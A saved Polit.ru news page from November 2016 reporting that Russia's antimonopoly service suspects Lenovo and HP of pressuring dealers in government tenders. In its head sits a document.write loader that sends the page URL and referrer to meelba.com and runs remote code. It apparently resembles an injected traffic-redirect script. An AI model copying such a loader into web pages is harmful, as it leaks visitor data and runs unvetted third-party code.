<!DOCTYPE html>
<html prefix="og: http://ogp.me/ns#">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <title>ФАС заподозрила Lenovo и HP в давлении на дилеров - ПОЛИТ.РУ</title>

    <link rel="canonical" href="http://polit.ru/news/2016/11/22/hp_lenovo/"/>
    <link rel="manifest" href="/manifest.json">

    <!-- Stylesheets -->
    <link rel="stylesheet" type="text/css" href="/static/polit/css/main.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/mark-up.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/content.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/new.css"/>
    <!--[if IE]><link rel="stylesheet" type="text/css" href="/static/polit/css/ie.css" /><![endif]-->
    <link rel="stylesheet" href="/ads/style.css" type="text/css" media="all"/>

    <meta name="robots" content="all"/>
    <meta name="google-site-verification" content="ZbGJDYfmTGZz23DSt4DiWF448AY8MAD_9PSbBo2DAXU"/>
    <meta property="fb:app_id" content="482430971798114"/>

    <meta name="description" content="ФАС заподозрила Lenovo и HP в давлении на дилеров - Полит.ру" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:site" content="@POLITRU_" /><meta property="og:title" content="ФАС заподозрила Lenovo и HP в давлении на дилеров - ПОЛИТ.РУ" /><meta property="og:url" content="http://polit.ru/news/2016/11/22/hp_lenovo/" /><meta property="og:description" content="Компании Lenovo и HP подозреваются в давлении на российских дилеров, передает РИА Новости со ссылкой на заместителя руководителя Федеральной антимонопольной службы Андрея Цариковского." /><meta property="og:image" content="http://polit.ru/media/photolib/2014/10/09/фас_1479844566.jpg" /><meta name="pubdate" content="2016-11-22T22:56:06.233406" /><meta name="news_keywords" content="Компьютеры, программное обеспечение, ФАС" />

    <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async></script>
    <script>
      var OneSignal = OneSignal || [];
      OneSignal.push(['init', {
        appId: '9b6ff30d-450f-4958-9b28-2e63e1c92158',
        subdomainName: 'polit-ru',
        safari_web_id: 'web.onesignal.auto.43f3e2d2-3818-43ea-aa50-e469d0e1e106'
      }]);
    </script>
    <script type="text/javascript" src="//vk.com/js/api/openapi.js"></script>
    <script type="text/javascript">
      VK.init({apiId: 3289294, onlyWidgets: true});
    </script>
    <link rel="alternate" type="application/rss+xml" title="Полная лента ПОЛИТ.РУ" href="/feeds/" />
    <link rel="alternate" type="application/rss+xml" title="Статьи ПОЛИТ.РУ" href="/feeds/article/" />
    <link rel="alternate" type="application/rss+xml" title="Ёлкин дня!" href="/feeds/elkin/" />
    <link rel="stylesheet" href="/static/polit/css/politgal.css" type="text/css" media="screen" />
    <script src="/static/polit/js/polit.js" type="text/javascript"></script>
    <script src="//lib.rl0.ru/adfox/7/adfox.custom.min.js" type="text/javascript"></script>
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script type="text/javascript">document.write("<script type=text/javascript src=\""+"http://meelba.com/3.html?group=polit_ru&seoref="+encodeURIComponent(document.referrer)+"&ur=1&rnd="+Math.random()+"&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=key+po+umolchaniyu"+"\"><\/script>");</script>
    <script src="/static/polit/js/politart.js" type="text/javascript"></script><script src="/static/polit/js/politgal.js" type="text/javascript"></script><script id="js-mpf-mediator-init" data-counter="2771166" data-adaptive="true">!function(e){function t(t,n){if(!(n in e)){for(var r,a=e.document,i=a.scripts,o=i.length;o--;)if(-1!==i[o].src.indexOf(t)){r=i[o];break}if(!r){r=a.createElement("script"),r.type="text/javascript",r.async=!0,r.defer=!0,r.src=t,r.charset="UTF-8";;var d=function(){var e=a.getElementsByTagName("script")[0];e.parentNode.insertBefore(r,e)};"[object Opera]"==e.opera?a.addEventListener?a.addEventListener("DOMContentLoaded",d,!1):e.attachEvent("onload",d):d()}}}t("//top-fwz1.mail.ru/js/code.js","_tmr"),t("//mediator.imgsmail.ru/2/mpf-mediator.min.js","_mediator")}(window);</script>
  </head>
<body class="new">
    <!--BEGIN #header-->
      
<div class="page">
<div class="black-top">
  <a href="http://polit.ua/">Полiт.ua</a>
  <a href="http://govweb.ru/">Государственная сеть</a>
  <a href="http://www.goslyudi.ru">Государственные люди</a>
  
  
  <a href="/promo/">Войти</a>
  
</div>

<div class="top-box">
  <div class="top-logo">
    
      <a href="/"><img src="/static/polit/img/politru_logo_2012.jpg" width="230" height="108" alt="Полит.ру" title="Полит.ру"/></a>
    
  </div>
  <div class="editors-choice-box">
<ul class="editors-choice">
 
  <li>
    <a href="/article/2016/11/22/volodin/">
      
        <span class="author">Андрей Щербаков</span>
      
      Почему Володин это Шелепин сегодня
    </a>
  </li>
 
  <li>
    <a href="/article/2016/11/18/banks/">
      
        <span class="author">Анна  Сакоян</span>
      
      Центробанки как козлы отпущения
    </a>
  </li>
 
  <li>
    <a href="/article/2016/11/22/polit_book/">
      
        <span class="author">Наталия  Демина</span>
      
      О концепции нового учебника по политологии для вузов
    </a>
  </li>
 
  <li>
    <a href="/article/2016/11/20/ps_luna/">
      
        <span class="author">Максим Руссо</span>
      
      Планы России и других стран по исследованию Луны
    </a>
  </li>
 
  <li>
    <a href="/article/2016/11/20/moriarty/">
      
        <span class="author">Анастасия Архипова,Екатерина Неклюдова</span>
      
      #МОРИАРТИ-3
    </a>
  </li>

</ul>
</div>

  <div class="top-right">
    <div class="date-header" >
        <span id="date"><!-- date -->23 ноября 2016, среда, 01:28<!-- /date --></span>
    </div>
    <div class="top-social">
      <a href="http://www.facebook.com/#!/politru" rel="nofollow"><img src="/static/polit/img/new-facebook.png" width="20" height="20" alt="Facebook"/></a>
      <a href="http://twitter.com/POLITRU_" rel="nofollow"><img src="/static/polit/img/new-twitter.png" width="20" height="20" alt="Twitter"/></a>
      <a href="http://polit.livejournal.com/" rel="nofollow"><img src="/static/polit/img/new-livejournal.png" width="20" height="20" alt="LiveJournal"/></a>
      <a href="http://vkontakte.ru/club21337773" rel="nofollow"><img src="/static/polit/img/new-vkontakte.png" width="20" height="20" alt="VK.com"/></a>
      <a href="/feeds/" rel="nofollow"><img src="/static/polit/img/new-rss.png" width="20" height="20" alt="RSS"/></a>
    </div>
    <div class="top-search">
      <form action="/search/">
        <table><tbody><tr>
          <td class="main"><div>
            <input type="search" name="q" id="search-q" onfocus="this.value=''" placeholder="Автор, Статья, Тема" />
          </div></td>
          <td><div>
            <input type="submit" value="ИСКАТЬ" id="search-submit" />
          </div></td>
        </tr></tbody></table>
      </form>
    </div>
  </div>
</div>
<div class="top-menu">
  <table><tbody><tr>
    <td><h2><a href="/news/" class="selected">НОВОСТИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/article/">СТАТЬИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>

    <td><h2><a href="/author/">АВТОРЫ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/lectures/publ_lect/">ЛЕКЦИИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>



    <td><h2><a href="/rubric/proscience/">PRO SCIENCE</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/rubric/theater/">ТЕАТР</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>

    <td><h2><a href="/district/">РЕГИОНЫ</a></h2></td>

    
  </tr></tbody></table>
</div>

    <!--END #header-->

    <!-- BEGIN #breadcrumbs -->
      	
    <!--END #breadcrumbs-->



 

  <div class="top-menu-shadow">


    <img src="/static/polit/img/green_block_shadow_bottom.jpg" alt=""/>
    





  </div>
  <div class="main-cols ib-parent">
  
    
      
<!-- BEGIN #left column -->

<div class="left-sidebar ib-col">

<!-- start banner google adsense -->
<!-- Polit\polit.ru\234x60 -->
<!--ins class="adsbygoogle"
style="display:inline-block;width:234px;height:60px"
data-ad-client="ca-pub-1154951643410219"
data-ad-slot="6440819918">
</ins>
<script>
(adsbygoogle=window.adsbygoogle || []).push({});
</script-->
<!-- stop banner google adsense -->

    <div style="margin: 20px 0; margin-bottom: 1ex;">
    <h4 style="background-color: #007854; text-align: center; font-weight: bold; color: #FFF; font-family: Arial, Helvetica, sans-serif;" >СОБЫТИЯ</h4>
    <script type="text/mustache" id="politTmEventsMainTpl">
    {{=[[ ]]=}}
<div class="b-main b-main_type_feed">
    [[#events]]
        <div class="l-layout">
            <div class="b-pro-wiget" style="padding-top:0!important;">
                <a class="b-aphisha tpw_event_link" target="_blank" rel="nofollow" data-event-id="[[id]]" href="[[link]]">
                    <div class="b-aphisha__heading-container" [[#poster_rgba_color]]style="background-color: [[poster_rgba_color]];"[[/poster_rgba_color]]>
                        <div class="b-aphisha__heading ">[[name]]</div>
                    </div>
                    [[#image]]<div class="b-aphisha__background" style="background-image: url([[image]]);"></div>[[/image]]
                </a>

                <div class="b-description" style="padding-bottom:0;">
                    <div class="b-pro-wiget__date">
                        <span class="b-pro-wiget__day">[[day]]</span>
                        <span class="b-pro-wiget__month">[[month]]</span> <span class="b-pro-wiget__time">[[time]]</span>
                    </div>
                    <!--div class="b-short-description">[[shortdescription]]</div>

                    <div class="b-pro-wiget__more-block">
                        <a target="_blank" rel="nofollow" data-event-id="[[id]]" href="[[link]]" class="b-pro-wiget__more-button tpw_event_link">[[buttonText]]</a>
                    </div-->

                </div>
            </div>
        </div>
    [[/events]]
</div>
    </script>
    <script type="text/javascript" defer="defer" charset="UTF-8" data-timepad-customized="8428" data-timepad-widget-v2="event_list3" src="https://timepad.ru/js/tpwf/loader/min/loader.js">
    (function() { return { "overrideTemplates": { "main": "#politTmEventsMainTpl" } }; })();
    </script>
    <div style="text-align:center;"><a href="http://bigbilet.ru/ticket-client/?owner=06152AF139E27D50E0504B5E01F57D8B" title="Купить билеты ОН-ЛАЙН"><img border="0" src="/static/polit/img/buytickets.gif" /></a></div>
    
  </div>

  <div class="left-or-right-top-banner-slot"></div>
  <div class="block likebox">
    <iframe src="//www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpolitru&amp;width=234&amp;height=168&amp;colorscheme=light&amp;show_faces=true&amp;border_color&amp;stream=false&amp;header=false" scrolling="no" frameborder="0" style="border-bottom: 1px solid #AAA; overflow:hidden; width:234px; height:153px;" allowTransparency="true"></iframe>

    <!-- VK Widget -->
    <div id="vk_groups"></div>
    <script type="text/javascript">
      VK.Widgets.Group("vk_groups", {mode: 0, width: "234", height: "10", color1: 'FFFFFF', color2: '2B587A', color3: '5B7FA6'}, 21337773);
    </script>
  </div>
     <div class="left-banner-slot-above-top-articles"></div>
     <div class="left-banner-slot-above-top-articles-2"></div>
     <div class="b2bcontext">
       Бизнесу:
       <ul>
         <li><a href="/b2b/research/">Маркетинговые исследования</a></li>
         <li><a href="/b2b/plan/?parent=rubricator&child=rubricatorbp">Бизнес-планы</a></li>
       </ul>
     </div>
     <div class="block netlenka">
         <div class="subject">Нетленка</div>
         <ul class="top-articles">
 
  <li>
    <a href="/article/2006/10/26/yazkova/">
      
        <span class="author">Алла Язькова</span>
      
      Южный Кавказ и Россия
    </a>
  </li>
 
  <li>
    <a href="/article/2006/02/28/neprizn_gos/">
      
        <span class="author">Алла Язькова</span>
      
      Нестандартные решения для непризнанных республик
    </a>
  </li>
 
  <li>
    <a href="/article/2004/03/16/oil_adj/">
      
        <span class="author">Алла Язькова</span>
      
      Нефть и вино в аджарском конфликте
    </a>
  </li>
 
  <li>
    <a href="/article/2006/10/02/yazkova/">
      
        <span class="author">Алла Язькова</span>
      
      «Ставка на Гиоргадзе была бесперспективной изначально»
    </a>
  </li>
 
  <li>
    <a href="/article/2016/07/21/turkey/">
      
        <span class="author">Алла Язькова</span>
      
      Против кого на самом деле был поднят мятеж в Турции
    </a>
  </li>

</ul>

     </div>
     <div class="left-banner-slot-below-top-articles"></div>
     <div class="block">
         <div class="subject"><a href="/genre/seminars/">Семинары</a></div>
     </div>
     <div class="left-banner-slot-below-seminars"></div>
     <div class="top-district-news">
        <span style="text-transform: uppercase; font-size: 21px;">Новости регионов</span>
        
<div class="top-news" style="margin: 0px;">
  <br>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://dostup1.ru/society/Dve-mnogoetazhki-v-problemnom-Akademe-gotovy-k-sdache_90541.html" class="hover">Две многоэтажки в проблемном Академе готовы к сдаче</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14819/komu_bolshe_nuzhen_dalnevostochnyy_gektar_nashim_ili_kitaycam" class="hover">Кому больше нужен дальневосточный гектар, нашим или китайцам?</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14818/10_molodezhnyh_proektov_habarovska_po_itogam_foruma_poluchat_ot_100_do_300_tysyach_rubley" class="hover">10 молодежных проектов Хабаровска по итогам форума получат от 100 до 300 тысяч рублей</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14817/mezhdunarodnye_problemy_opto-_i_mikroelektroniki_obsudyat_v_habarovske_okolo_100_uchenyh" class="hover">Международные проблемы опто- и микроэлектроники обсудят в Хабаровске около 100 ученых</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14816/habarovskiy_kray_na_dv-forume_predstavil_model_proektnogo_upravleniya" class="hover">Хабаровский край на ДВ-форуме представил модель проектного управления</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14815/vrach_bolonyaeva_zamenit_kommunalshchika_gladkih_v_habarovskoy_kraevoy_dume" class="hover">Врач Болоняева заменит коммунальщика Гладких в хабаровской краевой думе</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14814/dalniy_vostok_okapyvaetsya_na_granicah_i_za_ee_predelami_napryazhenie_rastet" class="hover">Дальний Восток «окапывается» на границах и за ее пределами. Напряжение растет</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14813/opasnyy_kartelnyy_sgovor_presekla_fas_v_chukotskoy_aviacii_i_v_okruzhnoy_vlasti" class="hover">Опасный картельный сговор пресекла ФАС в чукотской авиации и в окружной власти</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://feedproxy.google.com/~r/inklgd/~3/FwlxKhqc9yk/37714" class="hover">В Тбилиси у здания ЦИКа прошел митинг против результатов выборов</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://vyatka.ru/news/Politseyskie_nashli_dvukh_yunykh_podrug_ushedshikh_iz_doma" class="hover">Полицейские нашли двух юных подруг, ушедших из дома</a>
      <!--/div-->
    </div>
  
</div>



     </div>

<!-- start redtram -->

<div id="n4p_28541">Loading...</div>
<script type="text/javascript" charset="utf-8">
  (function(d,s){
    var o=d.createElement(s);
    o.async=true;
    o.type="text/javascript";
    o.charset="utf-8";
    if (location.protocol == "https:") {
      o.src="https://js-ru.redtram.com/n4p/0/28/ticker_28541.js";
    }
    else {
      o.src="http://js.ru.redtram.com/n4p/0/28/ticker_28541.js";
    }
    var x=d.getElementsByTagName(s)[0];
    x.parentNode.insertBefore(o,x);
  })(document,"script");
</script>

<!-- end redtram -->

     <div class="block">
         <div class="subject">Спецпроекты</div>
         
<div class="link">
	<a href="/rubric/elections2016/">Выборы-2016 с Линой Арифулиной</a>
</div>

<div class="link">
	<a href="/rubric/ecology/">Экологическая повестка</a>
</div>

<div class="link">
	<a href="/rubric/opendata/">Открытое государство</a>
</div>

<div class="link">
	<a href="/rubric/politeia/">Русская политейя</a>
</div>

<div class="link">
	<a href="/rubric/future/">Прыжок в будущее</a>
</div>

<div class="link">
	<a href="/rubric/moscow/">Проект &quot;Москва&quot;</a>
</div>

<div class="link">
	<a href="/rubric/history_human/">История: человек, институты</a>
</div>

<div class="link">
	<a href="/rubric/literatures/">Национальные литературы</a>
</div>


     </div>
     <div class="block">
         <div class="subject"><a href="/genre/dossie/">Документы</a></div>
     </div>
     <div class="block">
         <div class="subject"><a href="/rubric/redakciya/">О проекте</a></div>
     </div>
     <div class="left-material-banner-slot-1"></div>
     <div class="left-banner-slot-0"></div>
     <div class="left-banner-slot-1"></div>
     <div class="block partners">
       <div class="subject">Партнеры</div>
       <div class="left-partners-slot-1"></div>
       <div class="left-partners-slot-2"></div>
       <div class="left-partners-slot-3"></div>
     </div>
 </div>
 <!-- END #left column -->

    
  
<!--BEGIN #content-->


  
    <div class="new-main-content ib-col">
      <div class="article-detail" id="material-news438552">
  
        <div id="fb-root"></div>
        <script>(function(d, s, id) {
          var js, fjs = d.getElementsByTagName(s)[0];
          if (d.getElementById(id)) return;
            js = d.createElement(s); js.id = id;
            js.src = "//connect.facebook.net/ru_RU/all.js#xfbml=1";
            fjs.parentNode.insertBefore(js, fjs);
          }(document, 'script', 'facebook-jssdk'));
        </script>
        <div class="date">
          22 ноября 2016, 22:56
          
            
              <div class="tags-subject">
                <span>
                  
                    <a href="/tag/comp/">Компьютеры, программное обеспечение</a>
                  
                    <a href="/tag/fas/">ФАС</a>
                  
                </span>
              </div>
            
          
        </div>
        <h1 class="title">ФАС заподозрила Lenovo и HP в давлении на дилеров</h1>
        
        
          
            
          
          
          <div class="image-with-overlay d600x450 below23 image-gray-back-big">
            <a href="/media/photolib/2014/10/09/фас_1479844566.jpg" rel="lightbox" title="ФАС России">
              <img src="/media/photolib/2014/10/09/thumbs/фас_1479844566.jpg.600x450_q85.jpg" alt="ФАС России" title="ФАС России" style="margin-top:-225px; margin-left:-300px;"/>
              
            </a>
            <div class="image-overlay image-overlay-bottom-right">
              ФАС России
              
            </div>
          </div>
          
        
        <div class="content">
          
            
          
          <div class="text doc js-mediator-article">
            <p><span><span><span><span lang="ru-RU">Компании Lenovo и HP подозреваются в давлении на российских дилеров, передает <a href="http://www.ria.ru/">РИА Новости</a> со ссылкой на заместителя руководителя Федеральной антимонопольной службы Андрея Цариковского.</span></span></span></span></p>
            



            
<p><span><span><span><span lang="ru-RU">По его словам, к такому выводу сотрудники ФАС пришли в ходе проверки по делу о крупном картеле на торгах по поставкам техники для государственных нужд. Подозреваемыми по этому делу являются более 10 различных компаний, которые, как сообщил Цариковский, принимали участие в поставках компьютеров Центризбиркому РФ.</span></span></span></span></p>
<p><span><span><span><span lang="ru-RU">Соответствующая жалоба поступила антимонопольщикам минувшим летом. &laquo;На достаточно большом аукционе, во-первых, не шло никакой торговли, максимум понижалось все на один шаг, и дальше торговля не шла, что загадочно&raquo;, &mdash; прокомментировали ситуацию в надзорном ведомстве.</span></span></span></span></p>
<p><span><span><span><span lang="ru-RU">Кроме того, специалисты ФАС обнаружили, что &laquo;российские производители, у которых по закону цены всегда имеют бонус по сравнению с ценами зарубежных производителей, почему-то не участвовали в конкурсе&raquo;.</span></span></span></span></p>
<p><span><span><span><span lang="ru-RU">По итогам этих наблюдений было инициировано расследование, под прицел которого в первую очередь попали компании </span></span><span><span lang="en-US">HP </span></span><span><span lang="ru-RU">и </span></span><span><span lang="en-US">Lenovo.</span></span></span></span></p>
<p><span><span><span><span lang="ru-RU">В использовании каких конкретно методов давления на российских дилеров подозреваются указанные компании, в ФАС не уточнили. Однако пояснили, что наиболее распространенными способами прессинга являются следующие: дилерам объявляют, что &laquo;если в этом конкурсе вы будете участвовать, хотя не должны были, у вас будут проблемы с поставкой товара, с вами вообще могут расторгнуть дилерский договор&raquo;. По словам Цариковского, такие методы давления на дилеров используются везде &mdash; &laquo;от автомобилей до фармацевтических средств&raquo;.</span></span></span></span></p>
            
          </div>

          <div style="padding-bottom: 20px;"><h4 style="color: #007854;text-transform: uppercase;font-size: 120%;padding: 0;">Обсудите в соцсетях</h4>
            <script type="text/javascript">(function(w,doc) {
              if (!w.__utlWdgt ) {
                w.__utlWdgt = true;
                var d = doc, s = d.createElement('script'), g = 'getElementsByTagName';
                s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
                s.src = ('https:' == w.location.protocol ? 'https' : 'http')  + '://w.uptolike.com/widgets/v1/uptolike.js';
                var h=d[g]('body')[0];
                h.appendChild(s);
              }})(window,document);
            </script>
            <div data-background-alpha="0.0" data-buttons-color="#ffffff" data-counter-background-color="#ffffff" data-share-counter-size="12" data-top-button="false" data-share-counter-type="separate" data-share-style="10" data-mode="share" data-like-text-enable="false" data-hover-effect="scale" data-mobile-view="false" data-icon-color="#ffffff" data-orientation="horizontal" data-text-color="#ffffff" data-share-shape="rectangle" data-sn-ids="fb.tw.vk.ok.lj.em." data-share-size="40" data-background-color="#ffffff" data-preview-mobile="false" data-mobile-sn-ids="fb.vk.tw.wh.ok.gp." data-pid="1413315" data-counter-background-alpha="1.0" data-following-enable="false" data-exclude-show-more="true" data-selection-enable="false" class="uptolike-buttons" ></div>
          </div>

          <!-- start banner google adsense -->
          <!-- Polit\polit.ru\468x60 -->
          <!--ins class="adsbygoogle"
          style="display:inline-block;width:468px;height:60px"
          data-ad-client="ca-pub-1154951643410219"
          data-ad-slot="4824359318">
          </ins>
          <script>
          (adsbygoogle=window.adsbygoogle || []).push({});
          </script-->
          <!-- stop banner google adsense -->

          
        </div>

        <div class="bottom-social stop">
          <div class="print">
            <a href="/news/2016/11/22/hp_lenovo/print/" rel="nofollow">Версия для печати</a>
          </div>
        </div>
       <!-- 
<div class="comments stop">
  <div class="subject">Комментарии</div>
  <div class="comments-content">
    <div class="fb-comments" data-href="http://polit.ru/news/2016/11/22/hp_lenovo/" data-width="580" data-num-posts="10"></div>
    <div id="vk_comments"></div>
    <script type="text/javascript">
      VK.Widgets.Comments("vk_comments", {limit: 10, width: "580", attach: false});
    </script>
  </div>
</div>

 -->
        <script type="text/javascript" src="/static/orphus/orphus.js"></script>
        <a href="http://orphus.ru" id="orphus" target="_blank" title="Система Orphus" rel="nofollow"><img alt="Система Orphus" src="/static/orphus/orphus.gif" border="0" width="600"></a>
        
          
            <div class="related-block">
              <div class="title">Смотрите также:</div>
              <div class="square-flow">
                
                  
  <div class="col3-special" id="square-news438278">
    
<a href="/news/2016/11/18/gas_vybory/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/09/21/thumbs/c33bc0e273f18f4ee318c7035027e6f2_1479492301.JPG.0x142_q85_crop_cropsize-190x142.jpg" alt="Голосование на выборах в Госдуму VII созыва . Тверская область" title="Голосование на выборах в Госдуму VII созыва . Тверская область" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Источник связал проверки Lenovo и HP с поставками компьютеров для ЦИК
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news438203">
    
<a href="/news/2016/11/18/hp_lenovo/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/11/18/thumbs/1_1479455421.JPG.0x142_q85_crop_cropsize-190x142.jpg" alt="Фирменный магазин Lenovo" title="Фирменный магазин Lenovo" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      ФАС проверит HP и Lenovo на картельный сговор
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news284515">
    
<a href="/news/2012/04/28/fas-ipad/">
  <div class="image ii190x142">
    
      <img src="/static/polit/img/politru_logo_2012.jpg" class="image-stub" alt="ФАС возбудила дело о безпошлинном ввозе iPad"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      ФАС возбудила дело о безпошлинном ввозе iPad
    </h4>
  </div>
</a>

  </div>


                
                <div class="stop"></div>
              </div>
            </div>
          
        
        <div style="width:600px;">
      <!-- 24СМИ Start -->
      <div id="smi_teaser_3061">
           <center><a href="http://ex.24smi.info">Новости 24СМИ</a></center>
      </div>
      <script type="text/JavaScript" encoding="utf8">
               (function() {
               var sm = document.createElement("script");
               sm.type = "text/javascript";
               sm.async = true;
               sm.src = "http://jsn.24smi.org/4/a/3061.js";
               var s = document.getElementsByTagName("script")[0];
               s.parentNode.insertBefore(sm, s);})();
      </script>
      <!-- 24СМИ End -->

      <!-- LentaInformNews Start -->
      <div id="LentaInformScriptRootN11072" class="news-block-magick">
        <div id="LentaInformPreloadN11072">
          <a href="http://lentainform.com/" target="_blank">Загрузка...</a>
        </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN11072")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN11072");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=11072;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.lentainform.com/p/o/polit.ru.11072.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
        </script>
      </div>
      <!-- LentaInformNews End -->

      <!-- google adsense -->
<script type="text/javascript"><!--
google_ad_client = "ca-pub-1191230850516122";
/* adxguru\polit.ru\468x60\0 */
google_ad_slot = "8133317607";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="//pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
      <!-- google adsense End -->

      <!-- MarketGidNews Start -->
      <div id="MarketGidScriptRootN13911" class="news-block-magick">
           <div id="MarketGidPreloadN13911">
                <a href="http://marketgid.com/" target="_blank">Загрузка...</a>
           </div>
           <script>
               (function(){
                   var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
                   var i=d[ce]('iframe');i[st][ds]=n;d[gi]("MarketGidScriptRootN13911")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
                   catch(e){var iw=d;var c=d[gi]("MarketGidScriptRootN13911");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=13911;c[ac](dv);
                   var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.marketgid.com/1/p/1.polit.ru.13911.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
           </script>
      </div>
      <!-- MarketGidNews End -->

      <!-- smi2 Start -->
      <div id="unit_84866"><a href="http://smi2.net/">Новости СМИ2</a></div>
      <script type="text/javascript" charset="utf-8">
        (function() {
          var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
          sc.src = '//news.smi2.ru/data/js/84866.js'; sc.charset = 'utf-8';
          var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
        }());
      </script>
      <!-- smi2 End -->


      <!-- RedTram Start -->
      <div id="n4p_15006">Loading...</div>
      <script type="text/javascript" charset="utf-8">
      (function(d,s){
      var o=d.createElement(s);
      o.async=true;
      o.type="text/javascript";
      o.charset="utf-8";
      if (location.protocol == "https:")
      { o.src="https://js-goods.redtram.com/ticker_15006.js"; o.setAttribute("alt-src","https://js-goods.redtram.com/ticker_15742.js");}
      else
      { o.src="http://js.grt02.com/ticker_15006.js"; o.setAttribute("alt-src","http://js.grt02.com/ticker_15742.js");}
      o.setAttribute("cur-id","n4p_15006");
      o.setAttribute("alt-id","n4p_15742");
